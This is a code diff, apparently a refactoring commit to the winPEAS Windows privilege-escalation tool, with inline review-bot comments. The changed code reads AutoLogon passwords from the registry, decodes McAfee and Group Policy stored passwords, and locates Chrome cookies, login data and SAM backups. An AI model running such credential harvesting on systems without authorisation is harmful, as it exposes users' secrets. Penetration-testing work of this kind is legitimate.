ProgramFilesX86 = GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Documents and Settings\
|
||||
string documentsAndSettings = $"{SystemDrive}\\Documents and Settings\\";
|
||||
SearchHelper.DocumentsAndSettings = SearchHelper.GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
|
||||
DocumentsAndSettings = GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\ProgramData\Microsoft\Group Policy\History
|
||||
string groupPolicyHistory = $"{SystemDrive}\\ProgramData\\Microsoft\\Group Policy\\History";
|
||||
SearchHelper.GroupPolicyHistory = SearchHelper.GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
|
||||
GroupPolicyHistory = GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Documents and Settings\All Users\Application Data\\Microsoft\\Group Policy\\History
|
||||
string groupPolicyHistoryLegacy = $"{documentsAndSettings}\\All Users\\Application Data\\Microsoft\\Group Policy\\History";
|
||||
//SearchHelper.GroupPolicyHistoryLegacy = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, globalPattern);
|
||||
var groupPolicyHistoryLegacyFiles = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
|
||||
SearchHelper.GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
|
||||
var groupPolicyHistoryLegacyFiles = GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
|
||||
GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
|
||||
}
|
||||
|
||||
internal static void CleanLists()
|
||||
{
|
||||
SearchHelper.RootDirUsers = null;
|
||||
SearchHelper.RootDirCurrentUser = null;
|
||||
SearchHelper.ProgramFiles = null;
|
||||
SearchHelper.ProgramFilesX86 = null;
|
||||
SearchHelper.DocumentsAndSettings = null;
|
||||
SearchHelper.GroupPolicyHistory = null;
|
||||
RootDirUsers = null;
|
||||
RootDirCurrentUser = null;
|
||||
ProgramFiles = null;
|
||||
ProgramFilesX86 = null;
|
||||
DocumentsAndSettings = null;
|
||||
GroupPolicyHistory = null;
|
||||
|
||||
GC.Collect();
|
||||
}
|
||||
@@ -270,7 +270,7 @@ namespace winPEAS.Helpers.Search
|
||||
".*password.*"
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirUsers)
|
||||
foreach (var file in RootDirUsers)
|
||||
{
|
||||
//string extLower = file.Extension.ToLower();
|
||||
|
||||
@@ -297,7 +297,7 @@ namespace winPEAS.Helpers.Search
|
||||
{
|
||||
var result = new List<string>();
|
||||
|
||||
foreach (var file in SearchHelper.RootDirCurrentUser)
|
||||
foreach (var file in RootDirCurrentUser)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -337,7 +337,7 @@ namespace winPEAS.Helpers.Search
|
||||
".xml"
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.GroupPolicyHistory)
|
||||
foreach (var file in GroupPolicyHistory)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -361,14 +361,14 @@ namespace winPEAS.Helpers.Search
|
||||
};
|
||||
|
||||
string programDataPath = $"{SystemDrive}\\ProgramData\\";
|
||||
var programData = SearchHelper.GetFilesFast(programDataPath, GlobalPattern);
|
||||
var programData = GetFilesFast(programDataPath, GlobalPattern);
|
||||
|
||||
var searchFiles = new List<CustomFileInfo>();
|
||||
searchFiles.AddRange(SearchHelper.ProgramFiles);
|
||||
searchFiles.AddRange(SearchHelper.ProgramFilesX86);
|
||||
searchFiles.AddRange(ProgramFiles);
|
||||
searchFiles.AddRange(ProgramFilesX86);
|
||||
searchFiles.AddRange(programData);
|
||||
searchFiles.AddRange(SearchHelper.DocumentsAndSettings);
|
||||
searchFiles.AddRange(SearchHelper.RootDirUsers);
|
||||
searchFiles.AddRange(DocumentsAndSettings);
|
||||
searchFiles.AddRange(RootDirUsers);
|
||||
|
||||
foreach (var file in searchFiles)
|
||||
{
|
||||
@@ -403,7 +403,7 @@ namespace winPEAS.Helpers.Search
|
||||
".pdf",
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirCurrentUser)
|
||||
foreach (var file in RootDirCurrentUser)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -451,7 +451,7 @@ namespace winPEAS.Helpers.Search
|
||||
".pdf",
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirUsers)
|
||||
foreach (var file in RootDirUsers)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
|
||||
@@ -8,7 +8,8 @@ namespace winPEAS.Helpers.YamlConfig
|
||||
{
|
||||
public string name { get; set; }
|
||||
public RegularExpression[] regexes { get; set; }
|
||||
public class RegularExpression {
|
||||
public class RegularExpression
|
||||
{
|
||||
public string name { get; set; }
|
||||
public string regex { get; set; }
|
||||
|
||||
|
||||
@@ -1,10 +1,9 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Yaml.Serialization;
|
||||
using System.IO;
|
||||
using System.Reflection;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Yaml.Serialization;
|
||||
using static winPEAS.Helpers.YamlConfig.YamlConfig;
|
||||
using static winPEAS.Helpers.YamlConfig.YamlRegexConfig;
|
||||
|
||||
|
||||
namespace winPEAS.Helpers.YamlConfig
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Management;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -343,6 +343,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
usersPath = Directory.GetParent(usersPath).FullName;
|
||||
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(usersPath))
|
||||
{
|
||||
var userDirs = Directory.EnumerateDirectories(usersPath);
|
||||
|
||||
@@ -356,6 +358,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
@@ -363,6 +366,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
foreach (string path in autorunLocations)
|
||||
{
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
|
||||
|
||||
@@ -382,6 +387,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
|
||||
@@ -70,6 +70,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
{
|
||||
var results = new SortedDictionary<string, Dictionary<string, string>>();
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(fpath))
|
||||
{
|
||||
foreach (string f in Directory.EnumerateFiles(fpath))
|
||||
{
|
||||
@@ -83,6 +85,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
results[d] = PermissionsHelper.GetRecursivePrivs(d);
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.GrayPrint("Error: " + ex);
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System.Collections.Generic;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Info.EventsInfo.PowerShell;
|
||||
|
||||
namespace winPEAS.Info.EventsInfo.ProcessCreation
|
||||
{
|
||||
|
||||
@@ -127,7 +127,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
|
||||
byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };
|
||||
|
||||
// xor the input b64 string with the static XOR key
|
||||
var passwordBytes = System.Convert.FromBase64String(base64password);
|
||||
var passwordBytes = Convert.FromBase64String(base64password);
|
||||
for (var i = 0; i < passwordBytes.Length; i++)
|
||||
{
|
||||
passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Globalization;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.FilesInfo.Office.OneDrive;
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Helpers;
|
||||
|
||||
|
||||
@@ -6,7 +6,6 @@ using System.Linq;
|
||||
using System.Management;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.Helpers;
|
||||
@@ -33,7 +32,7 @@ namespace winPEAS.Info.ProcessInfo
|
||||
Proc = p,
|
||||
Pth = (string)mo["ExecutablePath"],
|
||||
CommLine = (string)mo["CommandLine"],
|
||||
Owner = Helpers.HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
|
||||
Owner = HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
|
||||
};
|
||||
|
||||
foreach (var itm in queRy)
|
||||
@@ -54,14 +53,16 @@ namespace winPEAS.Info.ProcessInfo
|
||||
}
|
||||
if ((string.IsNullOrEmpty(companyName)) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
|
||||
{
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>();
|
||||
to_add["Name"] = itm.Proc.ProcessName;
|
||||
to_add["ProcessID"] = itm.Proc.Id.ToString();
|
||||
to_add["ExecutablePath"] = itm.Pth;
|
||||
to_add["Product"] = companyName;
|
||||
to_add["Owner"] = itm.Owner == null ? "" : itm.Owner;
|
||||
to_add["isDotNet"] = isDotNet;
|
||||
to_add["CommandLine"] = itm.CommLine;
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>
|
||||
{
|
||||
["Name"] = itm.Proc.ProcessName,
|
||||
["ProcessID"] = itm.Proc.Id.ToString(),
|
||||
["ExecutablePath"] = itm.Pth,
|
||||
["Product"] = companyName,
|
||||
["Owner"] = itm.Owner == null ? "" : itm.Owner,
|
||||
["isDotNet"] = isDotNet,
|
||||
["CommandLine"] = itm.CommLine
|
||||
};
|
||||
f_results.Add(to_add);
|
||||
}
|
||||
}
|
||||
@@ -123,11 +124,13 @@ namespace winPEAS.Info.ProcessInfo
|
||||
|
||||
string hName = HandlesHelper.GetObjectName(dupHandle);
|
||||
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>();
|
||||
to_add["Handle Name"] = hName;
|
||||
to_add["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")";
|
||||
to_add["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName;
|
||||
to_add["Reason"] = handlerExp.reason;
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>
|
||||
{
|
||||
["Handle Name"] = hName,
|
||||
["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")",
|
||||
["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName,
|
||||
["Reason"] = handlerExp.reason
|
||||
};
|
||||
|
||||
if (typeName == "process" || typeName == "thread")
|
||||
{
|
||||
|
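Review bot: The `Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)` filter that guards the rewritten initializer in the `@@ -54,14 +53,16 @@` hunk has no comment saying what it trusts, and the same filter guards the `toadd` initializer in the ServicesInfo hunk `@@ -51,17 +50,18 @@`. If `companyName` comes from the binary's version resource (its source is outside these hunks), that value is self-declared, so any executable claiming a company name starting with "Microsoft" is dropped from the listing. I would add a comment such as `// CompanyName is self-declared metadata, not a signature check; entries filtered here are not verified as Microsoft binaries`. The trailing `.*` is also redundant and the test reads more plainly as `companyName.StartsWith("Microsoft", StringComparison.OrdinalIgnoreCase)`. The enclosing methods start and end outside the hunks.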
||||
@@ -1,4 +1,5 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
@@ -8,10 +9,8 @@ using System.Runtime.InteropServices;
|
||||
using System.Security.AccessControl;
|
||||
using System.ServiceProcess;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
|
||||
namespace winPEAS.Info.ServicesInfo
|
||||
@@ -51,17 +50,18 @@ namespace winPEAS.Info.ServicesInfo
|
||||
|
||||
if (string.IsNullOrEmpty(companyName) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
|
||||
{
|
||||
Dictionary<string, string> toadd = new Dictionary<string, string>();
|
||||
|
||||
toadd["Name"] = GetStringOrEmpty(result["Name"]);
|
||||
toadd["DisplayName"] = GetStringOrEmpty(result["DisplayName"]);
|
||||
toadd["CompanyName"] = companyName;
|
||||
toadd["State"] = GetStringOrEmpty(result["State"]);
|
||||
toadd["StartMode"] = GetStringOrEmpty(result["StartMode"]);
|
||||
toadd["PathName"] = GetStringOrEmpty(result["PathName"]);
|
||||
toadd["FilteredPath"] = binaryPath;
|
||||
toadd["isDotNet"] = isDotNet;
|
||||
toadd["Description"] = GetStringOrEmpty(result["Description"]);
|
||||
Dictionary<string, string> toadd = new Dictionary<string, string>
|
||||
{
|
||||
["Name"] = GetStringOrEmpty(result["Name"]),
|
||||
["DisplayName"] = GetStringOrEmpty(result["DisplayName"]),
|
||||
["CompanyName"] = companyName,
|
||||
["State"] = GetStringOrEmpty(result["State"]),
|
||||
["StartMode"] = GetStringOrEmpty(result["StartMode"]),
|
||||
["PathName"] = GetStringOrEmpty(result["PathName"]),
|
||||
["FilteredPath"] = binaryPath,
|
||||
["isDotNet"] = isDotNet,
|
||||
["Description"] = GetStringOrEmpty(result["Description"])
|
||||
};
|
||||
|
||||
results.Add(toadd);
|
||||
}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using Microsoft.Win32;
|
||||
using System.Collections.Generic;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -3,7 +3,6 @@ using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.AccessControl;
|
||||
using winPEAS.Native;
|
||||
using System.Security.Principal;
|
||||
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.NamedPipes
|
||||
@@ -51,7 +50,7 @@ namespace winPEAS.Info.SystemInfo.NamedPipes
|
||||
{
|
||||
var security = File.GetAccessControl($"\\\\.\\pipe\\{namedPipe}");
|
||||
sddl = security.GetSecurityDescriptorSddlForm(AccessControlSections.All);
|
||||
List<string> currentUserPermsList = winPEAS.Helpers.PermissionsHelper.GetMyPermissionsF(security, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> currentUserPermsList = Helpers.PermissionsHelper.GetMyPermissionsF(security, Checks.Checks.CurrentUserSiDs);
|
||||
currentUserPerms = string.Join(", ", currentUserPermsList);
|
||||
}
|
||||
catch
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics.Eventing.Reader;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
|
||||
@@ -9,7 +9,6 @@ using System.Net.NetworkInformation;
|
||||
using System.Windows.Forms;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.KnownFileCreds;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo
|
||||
{
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
{
|
||||
class WindowsDefenderSettingsInfo
|
||||
{
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Classes;
|
||||
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Net.NetworkInformation;
|
||||
using System.Security.Principal;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS.Helpers;
|
||||
|
||||
namespace winPEAS.Info.UserInfo
|
||||
|
||||
@@ -3,7 +3,6 @@ using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Cryptography.X509Certificates;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Structs;
|
||||
|
||||
|
||||
@@ -7,7 +7,6 @@ using System.Management;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Structs;
|
||||
|
||||
|
||||
@@ -6,7 +6,6 @@ using System.Windows.Forms;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.UserInfo.SAM;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
@@ -251,14 +250,15 @@ namespace winPEAS.Info.UserInfo
|
||||
|
||||
public static Dictionary<string, string> GetAutoLogon()
|
||||
{
|
||||
Dictionary<string, string> results = new Dictionary<string, string>();
|
||||
|
||||
results["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName");
|
||||
results["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName");
|
||||
results["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword");
|
||||
results["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName");
|
||||
results["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName");
|
||||
results["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword");
|
||||
Dictionary<string, string> results = new Dictionary<string, string>
|
||||
{
|
||||
["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName"),
|
||||
["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName"),
|
||||
["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword"),
|
||||
["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName"),
|
||||
["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName"),
|
||||
["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword")
|
||||
};
|
||||
return results;
|
||||
}
|
||||
|
||||
|
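Review bot: `GetAutoLogon` in the `@@ -251,14 +250,15 @@` hunk still repeats the registry path literal six times inside the new initializer, which makes a typo in one entry easy to miss. Hoisting it once, `const string winlogonKey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";`, and passing `winlogonKey` to each `RegistryHelper.GetRegValue` call keeps the six lookups visibly identical. The method also has no doc comment. A short `/// <summary>` should say that `DefaultPassword` and `AltDefaultPassword` are returned exactly as read from the registry, so callers know the dictionary holds credential material and should handle its output accordingly.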
||||
@@ -15,7 +15,7 @@ namespace winPEAS.InterestingFiles
|
||||
|
||||
try
|
||||
{
|
||||
string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
|
||||
string allUsers = Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
|
||||
|
||||
if (!allUsers.Contains("ProgramData"))
|
||||
{
|
||||
@@ -225,11 +225,13 @@ namespace winPEAS.InterestingFiles
|
||||
Changed = "[BLANK]";
|
||||
}
|
||||
|
||||
results[file] = new Dictionary<string, string>();
|
||||
results[file]["UserName"] = UserName;
|
||||
results[file]["NewName"] = NewName;
|
||||
results[file]["cPassword"] = cPassword;
|
||||
results[file]["Changed"] = Changed;
|
||||
results[file] = new Dictionary<string, string>
|
||||
{
|
||||
["UserName"] = UserName,
|
||||
["NewName"] = NewName,
|
||||
["cPassword"] = cPassword,
|
||||
["Changed"] = Changed
|
||||
};
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
|
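Review bot: In the `@@ -15,7 +15,7 @@` hunk, `Environment.GetEnvironmentVariable("ALLUSERSPROFILE")` returns null when the variable is unset, and the next line calls `allUsers.Contains("ProgramData")` on it unchecked. The resulting NullReferenceException lands in the enclosing `try`, whose `catch` is outside the hunk, so the whole check is presumably abandoned with a generic error line rather than a clear reason. An explicit `if (string.IsNullOrEmpty(allUsers))` guard with an early exit before the `Contains` call would make that case deliberate. The method body starts and ends outside the hunk.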
||||
@@ -28,7 +28,7 @@ namespace winPEAS.InterestingFiles
|
||||
$@"{systemRoot}\System32\config\RegBack\SYSTEM",
|
||||
};
|
||||
|
||||
results.AddRange(searchLocations.Where(searchLocation => System.IO.File.Exists(searchLocation)));
|
||||
results.AddRange(searchLocations.Where(searchLocation => File.Exists(searchLocation)));
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
@@ -102,7 +102,7 @@ namespace winPEAS.InterestingFiles
|
||||
// Reference: https://stackoverflow.com/questions/18071412/list-filenames-in-the-recyclebin-with-c-sharp-without-using-any-external-files
|
||||
int lastDays = 30;
|
||||
|
||||
var startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
var startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
// Shell COM object GUID
|
||||
Type shell = Type.GetTypeFromCLSID(new Guid("13709620-C279-11CE-A49E-444553540000"));
|
||||
|
||||
@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles
|
||||
|
||||
try
|
||||
{
|
||||
var winDir = System.Environment.GetEnvironmentVariable("windir");
|
||||
var winDir = Environment.GetEnvironmentVariable("windir");
|
||||
string[] searchLocations =
|
||||
{
|
||||
$"{winDir}\\sysprep\\sysprep.xml",
|
||||
@@ -56,7 +56,7 @@ namespace winPEAS.InterestingFiles
|
||||
$"{winDir}\\..\\unattend.inf",
|
||||
};
|
||||
|
||||
results.AddRange(searchLocations.Where(System.IO.File.Exists));
|
||||
results.AddRange(searchLocations.Where(File.Exists));
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Web.Script.Serialization;
|
||||
using winPEAS.Checks;
|
||||
@@ -27,7 +28,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
Beaprint.MainPrint("Looking for Chrome DBs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, string> chromeDBs = Chrome.GetChromeDbs();
|
||||
Dictionary<string, string> chromeDBs = GetChromeDbs();
|
||||
|
||||
if (chromeDBs.ContainsKey("userChromeCookiesPath"))
|
||||
{
|
||||
@@ -59,7 +60,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in Chrome history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, List<string>> chromeHistBook = Chrome.GetChromeHistBook();
|
||||
Dictionary<string, List<string>> chromeHistBook = GetChromeHistBook();
|
||||
List<string> history = chromeHistBook["history"];
|
||||
List<string> bookmarks = chromeHistBook["bookmarks"];
|
||||
|
||||
@@ -77,8 +78,11 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"Chrome history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -130,14 +134,14 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
else
|
||||
{
|
||||
string userChromeCookiesPath =
|
||||
$"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
|
||||
$"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
|
||||
if (File.Exists(userChromeCookiesPath))
|
||||
{
|
||||
results["userChromeCookiesPath"] = userChromeCookiesPath;
|
||||
}
|
||||
|
||||
string userChromeLoginDataPath =
|
||||
$"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
|
||||
$"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
|
||||
if (File.Exists(userChromeLoginDataPath))
|
||||
{
|
||||
results["userChromeLoginDataPath"] = userChromeLoginDataPath;
|
||||
@@ -156,7 +160,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
List<string> results = new List<string>();
|
||||
|
||||
// parses a Chrome history file via regex
|
||||
if (System.IO.File.Exists(path))
|
||||
if (File.Exists(path))
|
||||
{
|
||||
Regex historyRegex = new Regex(@"(http|ftp|https|file)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?");
|
||||
|
||||
@@ -217,10 +221,10 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
}
|
||||
else
|
||||
{
|
||||
string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
results["history"] = ParseChromeHistory(userChromeHistoryPath);
|
||||
|
||||
string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
results["bookmarks"] = ParseChromeBookmarks(userChromeBookmarkPath);
|
||||
}
|
||||
@@ -241,7 +245,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
try
|
||||
{
|
||||
string contents = System.IO.File.ReadAllText(path);
|
||||
string contents = File.ReadAllText(path);
|
||||
|
||||
// reference: http://www.tomasvera.com/programming/using-javascriptserializer-to-parse-json-objects/
|
||||
JavaScriptSerializer json = new JavaScriptSerializer();
|
||||
|
